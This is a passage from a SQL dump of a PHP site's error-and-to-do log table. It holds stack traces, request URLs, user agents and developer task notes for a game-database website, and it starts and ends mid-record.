/home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 20:12:26', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Beautify%20Creature%20tooltip', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (825, 'TODO', 'This might be problematic', '2c61209116237cbef266a63ff28d161438ecb5f8', 1, '/home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php', 13, '#0 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(28): tags::get(1, 1)\n#1 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'1\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#4 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#5 {main}', '37.24.148.242', 0.032, '2014-12-22 00:27:03', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 52, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (839, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'creature_template.Entry\' in \'on clause\'', 'bd3795e8278c121b07b9ef7bce9233c822bcaf5d', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-creature\', \'SELECT gameobje...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(84): SYSTEM\\DB\\Connection->prepare(\'search-creature\', \'SELECT gameobje...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(4): saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object(\'%\', \'{"1":"0","2":"-...\')\n#3 [internal function]: saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object_action_search(\'%\', \'{"1":"0","2":"-...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.036, '2014-12-22 05:08:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_object&action=search&search=%&tags={%221%22:%220%22,%222%22:%22-1%22}', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (772, 'Exception', 'Deploy', 'fb4192a0d1e98db49f6315e471f852385eb84ca8', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Deploy\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-15 03:28:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Deploy', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (773, 'Exception', 'Beta Code', 'b281123561627df8e9ee58ab6733686c2602b2ab', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Beta Code\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-15 03:31:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Beta%20Code', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (774, 'Exception', 'Equipment - Items', 'f491bd02c435327cbcaf114c2de64de9bb1e68e7', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Equipment - Ite...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-15 03:31:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Equipment%20-%20Items', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (938, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'page\' found.', '54fe1a17261616785f7c4dbff667ff06aa7e8116', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 15, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'page\', \'rhein_backgroun...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'page\', \'rhein_backgroun...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '37.24.146.231', 0.152, '2015-05-18 11:21:37', 'mojotrollz.eu', 80, '/api.php?call=files&cat=page&id=rhein_background.jpg', 'a:0:{}', 'http://mojotrollz.eu/web2/test/rhein/rhein/page/default_page/index.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36', 0, b'0', 0, 5, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (776, 'Exception', 'Troll Gnome Tauren mixup in viewer', 'f2681b1f45036352999caba743e6379309b31f6b', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Troll Gnome Tau...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-15 04:07:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Troll%20Gnome%20Tauren%20mixup%20in%20viewer', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (775, 'Exception', 'Quest linkable, map', 'd711b689532096233f89d2a64ae0f549cd5142c4', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Quest linkable,...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.012, '2014-12-15 03:56:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Quest%20linkable,%20map', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (777, 'Exception', 'Cron Status change', '837d8765ea6cd06eeb88ba5e351b53a05cf51ec7', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Cron Status cha...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-15 04:19:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Cron%20Status%20change', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (778, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'orc.png\' found.', '789ed061cc0953b1730d59858ebf88af707564b6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'class\', \'orc.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'class\', \'orc.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-15 13:49:42', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=class&id=orc.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (779, 'Exception', 'seppel commit equipbackground', 'bc0e51f331e90ddab6addb16ff3ef8025f8b6360', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'seppel commit e...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-15 14:13:47', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=seppel%20commit%20equipbackground', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (780, 'Exception', 'wizard_visuals size', '0339ac492f16e4085d730c328f2695e023b87c4a', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'wizard_details ...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-15 14:14:01', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=wizard_details%20size', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (781, 'Exception', 'creatures tag fiterable', 'bd1e190ab4caea91fa2c48a62e1baa11a84c4168', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'creatures tag f...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-15 14:27:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=creatures%20tag%20fiterable', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (782, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672675019', '807e310cd28b6e2d4c198e226606b693306c70e9', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.008, '2014-12-15 20:44:49', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672675019', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (783, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672675027', 'f0a63b7eececde4e24be0890c44f808351b584e7', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.008, '2014-12-15 20:44:50', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672675027', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (784, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672687289', '0b0aaf9b7ccfc58f7e5f3750b8d46c3967780380', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.008, '2014-12-15 20:44:51', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672687289', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (785, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672687297', '12bc1a2536a1ea3daf0523a618140a549500f360', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.004, '2014-12-15 20:44:52', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418672687297', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (787, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 55, '#0 [internal function]: page_mojotrollz::page_user_nexus_menu()\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '93.204.70.97', 0.052, '2014-12-16 15:05:08', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_menu&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (788, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418674515285', '8432cfc20a2d260c00211506aa88ec06a2fb8503', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.016, '2014-12-15 21:15:36', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418674515285', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, 